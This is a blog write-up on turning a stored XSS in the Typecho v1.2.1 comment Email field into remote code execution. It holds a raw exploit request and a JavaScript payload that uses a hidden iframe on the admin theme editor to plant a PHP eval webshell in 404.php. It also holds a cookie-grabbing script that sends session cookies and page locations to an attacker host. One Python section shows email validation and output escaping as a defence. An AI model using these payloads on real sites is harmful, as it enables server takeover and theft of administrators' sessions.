Typecho v1.2.1 RCE

Like the PHPStudy RCE from a while ago, this is a 1-click: RCE is reached through a stored XSS.

XSS

Today I noticed a new issue in Typecho's GitHub repository: There's still an XSS vulnerability in v1.2.1-rc

The vulnerability exists because the fix for the Typecho 1.2.0 XSS was incomplete. The payload given in the issue is as follows (the injection point is the Email field; in 1.2.0 it was the URL field):

"></a><script>alert('hacked')</script>"@example.com

Capture the request and send it directly:

POST /index.php/archives/1/comment HTTP/1.1
Host: ty.la
Content-Length: 153
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ty.la
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ty.la/index.php/archives/1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

author=%E6%B5%8B%E8%AF%95&mail="></a><script>alert('hacked')</script>"@example.com&url=&text=%E6%B5%8B%E8%AF%95&_=b04942bb37418474b1680405acf18a79
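The mail value in the request above is a syntactically legal address under RFC 5322 (a quoted local part), which is why a permissive email check lets it through. As an added example that is not Typecho's code, the Python below triages a comment form body against a dot-atom-only grammar and shows the output-encoding step that keeps even a slipped-through value inert inside an href; the sample bodies are constructed from the captured request, and all function names are my own.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample bodies: the first is the form body from the captured request,
# the second is an ordinary comment for comparison.
CAPTURED_BODY = ('author=%E6%B5%8B%E8%AF%95&mail="></a><script>alert(\'hacked\')</script>"@example.com'
                 '&url=&text=%E6%B5%8B%E8%AF%95&_=b04942bb37418474b1680405acf18a79')
BENIGN_BODY = 'author=alice&mail=alice%40example.com&url=&text=hi&_=0123456789abcdef'

# Dot-atom addresses only: RFC 5322 quoted local parts ("..."@host) are refused outright,
# so the quote and angle-bracket characters used by the payload never reach the database.
_ATOM = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+"
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
STRICT_MAIL = re.compile(rf"^{_ATOM}(?:\.{_ATOM})*@{_LABEL}(?:\.{_LABEL})+$")


def mail_is_acceptable(mail: str) -> bool:
    """True only for a plain dot-atom address; the issue's payload fails this check."""
    return len(mail) <= 254 and STRICT_MAIL.fullmatch(mail) is not None


def mailto_href(mail: str) -> str:
    """Render the stored value into an href attribute with every HTML metacharacter
    encoded (quote=True covers both quote styles). Validation narrows the attack
    surface; this encoding is what actually prevents the injection."""
    return 'href="mailto:' + html.escape(mail, quote=True) + '"'


def triage_comment_body(body: str) -> dict:
    """Parse an x-www-form-urlencoded comment submission and report on the mail field."""
    fields = parse_qs(body, keep_blank_values=True)
    mail = fields.get("mail", [""])[0]
    return {
        "author": fields.get("author", [""])[0],
        "mail": mail,
        "mail_ok": mail_is_acceptable(mail),
        "suspicious_chars": sorted(set(mail) & set('<>"\'')),
        "href": mailto_href(mail),
    }


if __name__ == "__main__":
    for body in (CAPTURED_BODY, BENIGN_BODY):
        r = triage_comment_body(body)
        print(r["mail_ok"], r["suspicious_chars"], r["href"])
```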


RCE

"></a><script/src=http://url/1.js></script>"@example.com

The contents of the JS file are as follows; the script comes from https://github.com/typecho/typecho/issues/1545. It works by inserting a hidden iframe that drives Typecho's built-in "Edit current theme" feature to perform the file write.

function step1() {
    var data2 = '<iframe id="testxss" src="/admin/theme-editor.php?theme=default&file=404.php" width="0%" height="0%" onload="poc()"></iframe>';
    var oldata = document.body.innerHTML;
    document.body.innerHTML = oldata + data2;
}

var times=0;
var g_shell=0;
function poc() {
    if (times <= 10) {
        var htmldata = document.getElementById("testxss").contentWindow.document.getElementById("content");
        var btn = document.getElementById("testxss").contentWindow.document.getElementsByTagName("button");
        olddatas = htmldata.innerText;
        htmldata.innerText = "<?php @eval($_POST[cmd])?>\n" + olddatas;
        btn[1].click();
        times += 1;
        if (g_shell == 1) {
            var xhr1 = new XMLHttpRequest();
            xhr1.open("get", "/usr/themes/default/404.php?shell=1");
            xhr1.send();
        } else {
            return 0;
        }
    }
}

step1();

Visiting the file shows that the one-line webshell has been written into 404.php.


Cookie-grabbing script

var website="http://xss.xxx.com";
(function(){(new Image()).src=website+'/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();

Author: iami233
Link: https://5ime.cn/typecho-xss2rce.html
License: this article is licensed under CC BY-NC-SA 3.0 CN